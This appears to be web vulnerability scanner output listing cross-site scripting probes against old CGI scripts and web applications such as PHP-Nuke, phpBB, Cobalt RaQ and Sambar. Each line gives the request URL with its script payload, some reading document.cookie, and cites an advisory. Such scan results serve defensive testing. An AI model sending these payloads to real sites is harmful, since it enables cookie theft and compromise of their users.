+ OSVDB-0: GET /scripts/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-win/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /fcgi-bin/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-exe/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-home/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-perl/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi.cgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /webcgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-914/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-915/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /mpcgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ows-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-local/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /htbin/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgibin/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgis/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /scripts/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-win/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /fcgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-exe/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-home/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-perl/betsie/parserl.pl/<script>alert('Vulnerable')</script>; : BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi.cgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /webcgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-914/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-915/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /mpcgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ows-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-local/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /htbin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgibin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgis/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /scripts/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-win/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /fcgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-exe/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-home/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-perl/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null : Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ OSVDB-0: GET /~/<script>alert('Vulnerable')</script>.aspx : Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ OSVDB-0: GET /~/<script>alert('Vulnerable')</script>.asp : Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ OSVDB-0: GET /catinfo?<u><b>TESTING : The Interscan Viruswall catinfo script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /user.php?op=userinfo&uname=<script>alert('hi');</script> : The PhpNuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com : Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script> : MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script> : SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
+ OSVDB-0: GET /submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview : This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ss000007.pl?PRODREF=<script>alert('Vulnerable')</script> : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P : CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: POST /servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script> : Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: POST /servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script> : Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /servlet/ContentServer?pagename=<script>alert('Vulnerable')</script> : Open Market Inc.ÊContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /search/index.cfm?<script>alert(\"Vulnerable\")</script> : Search agent allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /search.php?zoom_query=<script>alert(\"hello\")</script> : Wrensoft Zoom Search Engine is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /search.php?searchfor=\"><script>alert('Vulnerable');</script> : Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /search.asp?term=<%00script>alert('Vulnerable')</script> : ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers will render this). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /samples/search.dll?query=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /replymsg.php?send=1&destin=<script>alert('Vulnerable')</script> : This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSs). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X] : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phptonuke.php?filnavn=<script>alert('Vulnerable')</script> : PHPNuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-32774: GET /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script> : Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-32774: GET /phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script> : Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-0: GET /phpimageview.php?pic=javascript:alert('Vulnerable') : PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS).  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script> : phpBB is vulnerable to Cross Site Scripting (XSS), upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script> : phpBB is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script> : Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script> : Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script> : Vignette server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to the latest version.
+ OSVDB-0: GET /node/view/666\"><script>alert(document.domain)</script> : Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /netutils/whodata.stm?sitename=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /nav/cList.php?root=</script><script>alert('Vulnerable')/<script> : RaQ3 server script is vulnerable to Cross Site Scripting (XSS).  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query= : myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent : myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /myhome.php?action=messages&box=<script>alert('Vulnerable')</script> : OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script> : The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script> : The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script> : The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script> : Basit cms 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script> : The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2 : The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script> : Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script> : This install of PHPNuke's modules.php is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0 : Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script> : The DMOZGateway (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script> : Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script> : This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index : Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /megabook/admin.cgi?login=<script>alert('Vulnerable')</script> : Megabook guestbook is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script> : IBM Directory Server 4.1 Web Admin, ldacgi.exe is vulnerable to XSS attack.
+ OSVDB-0: GET /launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script> : NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /launch.asp?NFuse_Application=<script>alert('Vulnerable')</script> : NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /isapi/testisa.dll?check1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /index.php/\"><script><script>alert(document.cookie)</script>< : eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script> : eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search : eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> : myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> : myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /gallery/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script> : This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script> : YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /error/500error.jsp?et=1<script>alert('Vulnerable')</script>; : Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /download.php?sortby=&dcategory=<script>alert('Vulnerable')</script> : This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview : This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script> : RSA ClearTrust allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
